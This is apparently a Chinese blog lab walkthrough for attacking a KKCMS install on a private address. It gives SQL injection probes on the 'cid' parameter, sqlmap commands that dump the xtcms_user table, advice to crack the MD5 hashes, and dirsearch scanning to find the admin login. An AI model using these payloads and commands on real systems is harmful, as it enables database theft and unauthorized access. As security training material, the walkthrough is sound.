当前位置: 首页 > news >正文

KKCMS部署

目录

账号

网站目录


快看CMS使用手册

http://10.141.19.241/kkcms/install/

常规思路:页面点点观察url变化,参数

常规思路:点一个功能模块抓包看什么东西,正确是什么样,错误的是什么样,构造参数。

账号

随便选一个功能模块,一直在变

http://10.141.19.241/kkcms/vlist.php?cid=0

http://10.141.19.241/kkcms/vlist.php?cid=126

http://10.141.19.241/kkcms/vlist.php?cid=127

手工判断

cid=127 or 1%23
cid=127 or 0%23
cid=127 and sleep(3)%23

burpsuite抓包保存2.txt

sqlmap测试

python sqlmap.py -r  2.txt -dbs

python sqlmap.py -r  2.txt -D kkcms -tables

python sqlmap.py -r  2.txt -D kkcms -T xtcms_user  -dump-all

md5在线解密破解,md5解密加密

同样的操作你可以去跑其它的看看

网站目录

kali启用dirsearch网站目录探测

git clone https://github.com/maurosoria/dirsearch.git

cd dirsearch       #pwd  #/home/kali/dirsearch

#Pythone3.10后禁 pip 安装包到全局环境而pipx 会为每个工具创建独立的虚拟环境。

pipx install .

dirsearch -u http://10.141.19.241/kkcms/ -e php

访问http://10.141.19.241/kkcms/admin/cms_login.php

说明,不做其它过多测试,实验进入到后台即可。想玩的自己玩。

http://www.xdnf.cn/news/897985.html

相关文章:

  • Truffle 和 Ganache 使用指南
  • MADlib —— 基于 SQL 的数据挖掘解决方案(4)—— 数据类型之矩阵
  • R 语言科研绘图第 55 期 --- 网络图-聚类
  • T/SAIAS 018—2025《具身智能语料库建设导则》研究报告:体系解构与实施路径
  • LCTF液晶可调谐滤波器在多光谱相机捕捉无人机目标检测中的作用
  • Aspose.PDF 限制绕过方案:Java 字节码技术实战分享(仅供学习)
  • 软考 系统架构设计师系列知识点之杂项集萃(84)
  • awk处理xml文件封装集合变量和调用
  • Git仓库的创建
  • 机器学习笔记【Week7】
  • window安装docker
  • 无需域名,直接加密IP的SSL方案
  • Docker容器化技术概述与实践
  • 【Python工具开发】k3q_arxml 简单但是非常好用的arxml编辑器,可以称为arxml杀手包
  • python闭包与装饰器
  • Chrome安装代理插件ZeroOmega(保姆级别)
  • 浏览器工作原理01 [#]Chrome架构:仅仅打开了1个页面,为什么有4个进程
  • .NET AOT 详解
  • Spring AI 入门:Java 开发者的生成式 AI 实践之路
  • 保姆级【快数学会Android端“动画“】+ 实现补间动画和逐帧动画!!!
  • C#报错 iText.Kernel.Exceptions.PdfException: ‘Unknown PdfException
  • uniapp+vue2解构赋值和直接赋值的优缺点
  • 12.vite,webpack构建工具
  • 云原生玩法三问:构建自定义开发环境
  • 父组件prop传向子组件的值,被子组件直接v-model绑定 功能不生效
  • win10安装WSL2、Ubuntu24.04
  • 华为云学堂-云原生开发者认证课程列表
  • uniapp 集成腾讯云 IM 富媒体消息(地理位置/文件)
  • 惊艳呈现:探索数据可视化的艺术与科学
  • 详细介绍uni-app中Composition API和Options API的使用方法